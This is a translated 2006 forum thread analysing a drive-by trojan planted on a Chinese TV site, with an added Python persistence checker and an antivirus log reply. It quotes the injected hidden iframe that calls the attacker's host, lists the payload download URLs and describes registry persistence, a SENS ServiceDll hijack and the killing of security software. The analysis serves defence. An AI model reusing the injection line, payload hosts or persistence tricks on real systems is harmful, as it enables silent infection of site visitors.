Views: 5565 | Replies: 1

[Repost] Extracted sample and rough analysis of the trojan planted on the Mayi (蚂蚁) online TV section today

起点
Posted on 2006-12-1 19:33:18

The sample is in the attachment; the archive password is virus.


The source of the online TV section contains the following line, and http://ddos.sesese.cn/news/admin/upline/ma.htm is the malicious page:
<iframe width="0" height="0" src="http://ddos.sesese.cn/news/admin/upline/ma.htm"  frameborder="no" border="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>

A driver-level trojan; it loads even in Safe Mode, which makes it a pain to deal with.


When the infected page is opened, it attempts to download the following files:
http://ddos.sesese.cn/News/admin/upline/ddos.exe
http://ddos.sesese.cn/xiazai1.exe
http://www.8442.cn/xiazai2.exe
http://www.lotsky.net/xiazai3.exe
http://www.suzwb.com/mo/hy/1.exe
http://www.suzwb.com/mo/hy/2.exe
The last two links are already dead, speechless -_-^^^^^^^^

At boot it attempts to use the taskkill command to terminate several processes, including the Tianwang (Skynet) firewall and Security Center.


Hidden process: C:\Program Files\Internet Explorer\iexplore.exe


Files created:
1. In the Windows directory: iexplore.exe, tep3.exe
2. In the system32 directory: qq.exe, saqzsocr.dll      (hidden by the rootkit)
3. In the system32\drivers directory: saqzsocr.dll         (hidden by the rootkit)
4. In the IE cache: ddos[1].exe, xiazai1[1].exe, xiazai2[1].exe, 123[1].txt, s[1].htm, xiazai3[1].htm
5. On some partitions: readme.exe, autorun.inf


Registry modifications:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe qq.exe"    (originally "Explorer.exe")
HKEY_USERS\S-1-5-21-475796281-668117986-821673624-500\Software\Microsoft\Internet Explorer\Main\Start Page: "http://www.3484.cn"      (home page address)
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 3C 00 00 00 02 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

There are also some other modifications to IE; I couldn't be bothered to dig them out, just use a repair tool to fix them, nice and easy ^_^


Drivers and services:
1. Creates: the saqzsocr service (hidden)

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Control\*NewlyCreated*: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Control\ActiveService: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Service: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\0000\DeviceDesc: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SAQZSOCR\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Enum\0: "Root\LEGACY_SAQZSOCR\0000"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Enum\Count: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Enum\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Type: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\ErrorControl: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\ImagePath: "\??\C:\WINDOWS\system32\drivers\saqzsocr.sys"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\saqzsocr\DisplayName: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Control\*NewlyCreated*: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Control\ActiveService: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Service: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Legacy: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\ConfigFlags: 0x00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\Class: "LegacyDriver"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\0000\DeviceDesc: "saqzsocr"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SAQZSOCR\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Enum\0: "Root\LEGACY_SAQZSOCR\0000"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Enum\Count: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Enum\NextInstance: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Type: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\ErrorControl: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\ImagePath: "\??\C:\WINDOWS\system32\drivers\saqzsocr.sys"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\DisplayName: "saqzsocr"

2. Modifies: the SENS service (System Event Notification) (shameless!)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SENS\Parameters\ServiceDll: "%SystemRoot%\System32\saqzsocr.dll" (originally "%SystemRoot%\system32\sens.dll")
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\SENS\Parameters\ServiceDll: "%SystemRoot%\System32\saqzsocr.dll" (originally "%SystemRoot%\system32\sens.dll")
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters\ServiceDll: "%SystemRoot%\System32\saqzsocr.dll" (originally "%SystemRoot%\system32\sens.dll")




[ This post was last edited by navigateqd on 2006-12-1 20:01 ]

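A defender's check for the three persistence changes the post lists (the Winlogon Shell value, the SENS ServiceDll swap, and the auto-start kernel driver service). This is an added example, not code from the original post; it reads lines in the same key\value: data layout the post uses, and the sample input below is constructed from the values the post reports plus one made-up clean driver entry.

```python
from collections import defaultdict

# Constructed sample in the same "key\value: data" layout as the post's
# listing (not a real registry export). The three malicious values are the
# ones the post reports; the "beep" driver is a constructed clean service.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: "Explorer.exe qq.exe"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SENS\Parameters\ServiceDll: "%SystemRoot%\System32\saqzsocr.dll"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Type: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\Start: 0x00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\saqzsocr\ImagePath: "\??\C:\WINDOWS\system32\drivers\saqzsocr.sys"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\beep\Type: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\beep\Start: 0x00000001
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\beep\ImagePath: "system32\drivers\beep.sys"
"""

# Known-good defaults (compared case-insensitively).
EXPECTED_SHELL = "explorer.exe"
EXPECTED_SENS_DLL = r"%systemroot%\system32\sens.dll"
KERNEL_DRIVER, AUTO_START = 1, 2   # SERVICE_KERNEL_DRIVER, SERVICE_AUTO_START


def parse_listing(text):
    """Group 'key\\name: data' lines into {key_path: {value_name: data}}."""
    keys = defaultdict(dict)
    for line in text.splitlines():
        if ": " not in line:
            continue
        full, data = line.strip().split(": ", 1)
        path, _, name = full.rpartition("\\")
        keys[path.lower()][name.lower()] = data.strip().strip('"')
    return dict(keys)


def _dword(values, name):
    return int(values[name], 16) if name in values else None


def check_persistence(keys):
    """Return (finding, detail) pairs for the tricks the post describes."""
    findings = []
    for path, v in keys.items():
        # 1. Winlogon\Shell must be exactly Explorer.exe; any extra token
        #    (here qq.exe) is a second program launched at every logon.
        if path.endswith(r"\winlogon") and "shell" in v and v["shell"].lower() != EXPECTED_SHELL:
            findings.append(("winlogon-shell", v["shell"]))
        # 2. The SENS svchost service has been pointed at a rogue ServiceDll.
        if path.endswith(r"\services\sens\parameters") and "servicedll" in v \
                and v["servicedll"].lower() != EXPECTED_SENS_DLL:
            findings.append(("sens-servicedll", v["servicedll"]))
        # 3. A kernel driver (Type 1) set to auto start (Start 2): this is how
        #    the hidden saqzsocr service is loaded on every boot.
        if _dword(v, "type") == KERNEL_DRIVER and _dword(v, "start") == AUTO_START:
            findings.append(("autostart-kernel-driver", v.get("imagepath", path)))
    return findings


if __name__ == "__main__":
    for kind, detail in check_persistence(parse_listing(SAMPLE)):
        print(f"{kind:25} {detail}")
```

The auto-start driver check is informational on its own (legitimate drivers use Start 2 too); it is the combination with an unknown service name and a file the rootkit hides that makes it worth triage.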
dragoonwing
Posted on 2006-12-3 16:58:45
Nasty virus; Avira (红伞) killed quite a few of them just while I was unpacking the archive.
2006-12-3,17:00:13 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.B Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.dll
2006-12-3,17:00:13 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\qq.exe
2006-12-3,17:00:13 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.B Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.dll
2006-12-3,17:00:13 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\qq.exe
2006-12-3,17:00:13 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\qq.exe
      [INFO] The file will be deleted.
2006-12-3,17:00:22 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\iexplore.exe
2006-12-3,17:00:22 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.C Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.sys
2006-12-3,17:00:22 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\iexplore.exe
2006-12-3,17:00:22 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.C Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.sys
2006-12-3,17:00:22 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.C Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.sys
      [INFO] The file will be deleted.
2006-12-3,17:00:24 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\系统中提取的\readme.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Hijack.Explor.796!
  C:\Documents and Settings\dragoon\桌面\backdoor\du\企图下载的\ddos.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\企图下载的\xiazai1.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Hijack.Explor.796!
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\企图下载的\xiazai1.exe
2006-12-3,17:00:25 [WARNING] Is the Trojan horse TR/Dldr.VB.aly!
\backdoor\du\企图下载的\xiazai1.exe
      [INFO] The file will be deleted.
2006-12-3,17:00:13 [WARNING] Contains a signature of the (dangerous) backdoor program BDS/PcClient.hp.1.B Backdoor server programs!
\backdoor\du\系统中提取的\saqzsocr.dll
      [INFO] The file will be deleted.